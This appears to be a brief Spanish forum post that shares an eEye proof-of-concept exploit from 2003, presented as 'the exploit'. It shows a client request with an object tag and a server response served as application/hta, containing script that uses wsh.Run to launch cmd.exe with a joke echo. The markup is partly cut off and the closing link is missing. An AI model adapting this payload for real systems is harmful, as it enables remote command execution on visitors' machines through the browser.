Aqui teneis el exploit:

The following proof of concept example has been made available by eEye:

--------------Client HTTP request---------------------------
<object data="">

-------------Server HTTP Response---------------------------
HTTP/1.1 200 OK
Date: Tue, 13 May 2003 18:06:43 GMT
Server: Apache
Content-Type: application/hta
Content-Length: 191

<object id='wsh'
wsh.Run("cmD.exe /k echO so loNg, and ThaNks For all yoUr EmplOyeeS");

Mas info en: